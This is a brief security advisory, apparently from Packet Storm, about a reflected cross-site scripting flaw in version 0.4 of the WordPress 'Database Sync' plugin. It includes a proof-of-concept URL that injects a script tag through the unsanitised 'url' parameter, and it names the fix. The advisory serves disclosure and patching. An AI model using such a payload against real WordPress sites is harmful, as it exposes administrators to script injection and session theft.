WordPress Database Sync 0.4 Cross Site Scripting

Posted on Posted in Exploit

WordPress Database Sync plugin version 0.4 suffers from a cross site scripting vulnerability.

Title: WordPress 'Database Sync' Plugin 
Version: 0.4
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
Download: 
- https://wordpress.org/plugins/database-sync/
- https://plugins.svn.wordpress.org/database-sync/
==========================================================

## Plugin description
==========================================================
Sync databases across servers with a single click.

## Vulnerabilities
==========================================================
The GET parameter 'url' is printed directly to the page without sanitization making XSS possible.

PoC:
Log in as admin and visit the following URL:
[URL]/wp-admin/tools.php?page=dbs_options&dbs_action=sync&url="><script>alert(1)</script>


## Solution
==========================================================
Update to v.0.5.

==========================================================
Vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.

Quelle: Packet storm Security

Facebooktwittergoogle_plus